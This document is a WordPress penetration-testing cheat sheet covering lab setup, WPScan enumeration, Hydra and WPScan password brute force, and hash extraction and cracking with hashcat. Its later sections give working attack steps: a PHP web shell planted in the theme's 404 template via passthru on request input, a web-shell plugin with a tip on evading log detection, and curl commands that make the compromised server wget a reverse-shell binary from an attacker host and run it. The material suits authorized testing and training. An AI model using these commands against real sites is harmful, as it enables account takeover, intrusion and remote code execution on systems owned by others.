WordPress is a Content Management System (CMS).
Testing WordPress
Test for outdated plugins
Use WPScan to list plugins.
Test for XMLRPC exposure

TO COMPLETE
Test for exposed admin portal
From Enumerate Infrastructure and Application Admin Interfaces (WSTG-CONF-05, OWASP Testing Guide):
wp-admin/
wp-admin/about.php
wp-admin/admin-ajax.php
wp-admin/admin-db.php
wp-admin/admin-footer.php
wp-admin/admin-functions.php
wp-admin/admin-header.phpUsing Burp Suite
- Install the WordPress Scanner extension from the BApp Store.
- Browse WordPress sites through Burp proxy.
- Vulnerable plugins and themes will appear on the issue list. Issues will also appear inside Scanner tab. Interesting things will be highlighted.
Install WordPress on Kali Linux
Download WordPress, copy files to Apache’s root directory
wget -O /tmp/wordpress.tar.gz https://wordpress.org/latest.tar.gzsudo tar -xzvf /tmp/wordpress.tar.gz -C /var/www/html/sudo chown -R www-data.www-data /var/www/html/wordpressStart Apache and MySQL
sudo service apache2 startsudo service mysqld startCreate the WordPress database

Change the password!
sudo mysql
CREATE DATABASE wordpress;
GRANT SELECT,INSERT,UPDATE,DELETE,CREATE,DROP,ALTER
ON wordpress.*
TO wordpress@localhost
IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
quitInstall WordPress
- Open a browser: http://127.0.0.1/wordpress/wp-admin/setup-config.php
- Choose English
Database name: wordpress
User name: wordpress
Password: ENTER ONE FROM THE DATABASE
Database host: localhost
Table prefix: wp_ Access the website at http://127.0.0.1/wordpress/
Change max file size for upload (for importing files of other WordPress site)
sudo nano /etc/php/8.1/apache2/php.ini# upload_max_filesize = 2M
upload_max_filesize = 20Msudo service apache2 reloadFix permalinks not found error
sudo a2enmod rewritesudo nano /etc/apache2/apache2.confChange AllowOverride to “All” instead of “None”.
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>sudo service apache2 restartUpdate WordPress on Kali Linux
The update process requires an FTP server on the web server.

Not recommended to use root as an FTP user account.
ftp.py
#!/usr/bin/python
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
authorizer = DummyAuthorizer()
authorizer.add_user("root", "MYPASSWORD", "/var/www/html/wordpress", perm="elradfmwMT")
handler = FTPHandler
handler.authorizer = authorizer
server = FTPServer(("127.0.0.1", 21), handler)
server.serve_forever()./ftp.pyLog in to the WordPress dashboard, and click on Updates.
Configuration Files

wp-config.php contains database credentials.
/var/www/html/wp-config.phpFor troubleshooting, see Debugging in WordPress.
Recon
Exploits
Search for “WordPress” or plugin name in the Exploit Database.
WordPress Plugin WP Feed – ‘nid’ SQL Injection
https://www.exploit-db.com/exploits/38624
http://somedomain.com/wp-content/plugins/feed/news_dt.php?nid=[Sql] Bruteforce login

Try user “admin” first.
Hydra – specific user
See Hydra.
IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt
SUCCESS_MSG="302 Found"
COOKIES="wordpress_test_cookie=WP+Cookie+check"hydra $IP http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3a//${IP}/wp-admin/&testcookie=1:S=$SUCCESS_MSG:H=Cookie: ${COOKIES}" -l admin -P $WL -vV -fWPScan – specific user
# --password-attack: wp-login, xmlrpc, xmlrpc-multicall
URL="http://x.x.x.x/wp"
WL=/usr/share/wordlists/rockyou.txt
wpscan --url $URL -P $WL -U admin --password-attack wp-loginWPScan
WordPress Vulnerability Scanner.
Installation
Can also be downloaded on Github.
sudo apt install wpscanCustom environment variables for commands
DIR="~/Documents"
URL="http://someurl.com"
WL="/usr/share/wordlists/rockyou.txt"Help
wpscan --helpUpdate the database
wpscan --updateDo ‘non-intrusive’ checks
wpscan --url $URL --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`List vulnerable plugins
wpscan --url $URL --enumerate vp --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`Enumerate installed plugins …
wpscan --url $URL --enumerate p --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`Enumerate installed themes …
wpscan --url $URL --enumerate t --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`Enumerate users …
wpscan --url $URL --enumerate u -o $DIR/wpscan_`date +"%Y%m%d_%H%M"`All Plugins (ap), All Themes (at), Config backups (cb), Db exports (dbe)
wpscan --url $URL --enumerate ap,at,cb,dbeWP Enum (Authenticated)
- Log in the WordPress control panel at /wp-admin
- Click on Tools->Site Health.
- Click on Info tab.
- Click on Server.
WP Database
mysql -u root -p wordpressExtract usernames and password hashes
select user_login, user_pass from wp_users;Crack hashes with Hashcat, use hash type 400.
HASH=hash.txt
TYPE=400
WL=/usr/share/wordlists/rockyou.txt
hashcat -m $TYPE -a 0 $HASH $WL
hashcat -m $TYPE -a 0 $HASH $WL --showChange user password
update wp_users set user_pass=MD5('admin') where user_login='admin';Webshells & Reverse shells
- Hacking Articles
- php-reverse-shell (Pentestmonkey)
Webshell in 404 Not Found
- Log into WordPress at /wp-admin.
- Click on Appearance->Editor.
- Click on 404 Template.
- Add code at the end of the file. Keep the rest of the code.
<?php echo "<p>Hacked</p>";?>
<?php passthru($_REQUEST[myprecious]); ?>To execute commands, visit a post id that does not exist or the theme 404 page.
http://x.x.x.x/?p=10000&myprecious=whoamihttp://x.x.x.x/wp-content/themes/twentyfifteen/404.php&myprecious=whoamiInstall a Web-Shell Plugin
Seclists contains a Web-Shell plugin and is already in Kali Linux.
Zip the plugin code
cd /usr/share/seclists/Web-Shells/WordPress
sudo zip plugin-shell.zip plugin-shell.phpInstall the plugin
- Log into WordPress at /wp-admin.
- Click on Plugins. Click on Add New.
- Click on Upload Plugin. Click on Browse, select the plugin-shell.zip file and click Open. Click Install Now.
No need to Activate the plugin.
Test the plugin

Plugin documentation suggests to use POST requests to evade detection in log files 😉
curl http://example.com/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoamiUpload a reverse shell payload and execute it
Generate a reverse shell and start a listener. See Msfvenom.
python3 -m http.server 80curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=wget%20-O%20rev.elf%20http://KALI_IP/rev.elf
# Do not forget to encode the "+" sign using %2b
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=chmod%20u%2bx%20rev.elf
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=ls%20-la
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=./rev.elf